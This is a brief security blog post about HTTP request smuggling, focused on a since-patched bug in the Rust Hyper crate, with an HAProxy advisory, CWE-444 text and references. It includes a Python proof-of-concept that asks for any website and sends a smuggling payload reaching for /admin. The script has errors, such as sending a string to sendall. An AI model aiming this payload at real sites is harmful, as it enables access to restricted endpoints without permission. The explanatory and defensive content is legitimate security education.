Rust Hyper Request smuggling

The exploit of the day is a request smuggling vulnerability found in the HTTP Rust library Hyper.

Firo Solutions Request Smuggling

Request Smuggling

Request smuggling is sending 2 requests inside one payload so normally you would go to the website and one request is sent
but with request smuggling you send 1 payload of data and fool the server that the request is 2 different request instead of one.
This method of attacking got very popular after affecting the popular HAProxy and the great security researcher https://twitter.com/albinowax
published a blog post talking about it.

HTTP smuggling has affected a lot of software like:
Netty
CVE-2020-7238
https://github.com/jdordonezn/CVE-2020-72381/issues/1

Apache tomcat

Nginx

HAProxy

Waitress

Gitlab

And many more even squid.

It even got a CWE(Common Weakness Enumeration) definition: “When malformed or abnormal HTTP requests are interpreted by one or more entities in the data flow between the user and the web server, such as a proxy or firewall, they can be interpreted inconsistently, allowing the attacker to “smuggle” a request to one device without the other device being aware of it.” https://cwe.mitre.org/data/definitions/444.html

An interesting discovery was found in the hyper HTTP crate.
It’s a simple bug the client that handles the “transfer-encoding: chunked” part of the
GET request wrongly.

HAProxy

Nathan Davison reported a vulnerability in HAProxy:

Nathan Davison (@ndavison) reported that in legacy mode we didn't correctly
rejected messages featuring a transfer-encoding header missing the "chunked"
value. The impact was limited, but if combined with "http-reuse always", it
could be used as an help to construct a content smuggling attack against a
vulnerable component employing a lenient parser which would ignore the
content-length header as soon as it sees a transfer-encoding one, without even
parsing it.

He then wrote a blog post about using HAProxy as a load balancer and a python flask backend
then by exploiting that HAProxy doesnt reject the bad “Transfer-Encoding: chunked” messages
was able to cause a http-smuggling attack.

https://nathandavison.com/blog/haproxy-http-request-smuggling https://www.mail-archive.com/haproxy@formilux.org/msg34926.html

Poc example exploit

import socket 

website = input('gime website:')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((website, 80))

stuff = """

GET /stuff HTTP/1.1
Host: {}
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: {}
Foo: xGET /home HTTP/1.1
Host: {}


""".format(website, website, website)

s.sendall(stuff)
response = s.recv(1024) # change if needed 
print('got back: ', response)


https://crates.io/crates/hyper
https://docs.rs/hyper/

Check your cargo.toml files here:
https://rust.firosolutions.com

The hyper crate has been patched since 0.12.34

Request smuggling was also one of the challanges in a recent
capture the flag contest:

https://github.com/jdordonezn/CVE-2020-72381/issues/1
https://portswigger.net/web-security/request-smuggling/
https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
https://nathandavison.com/blog/haproxy-http-request-smuggling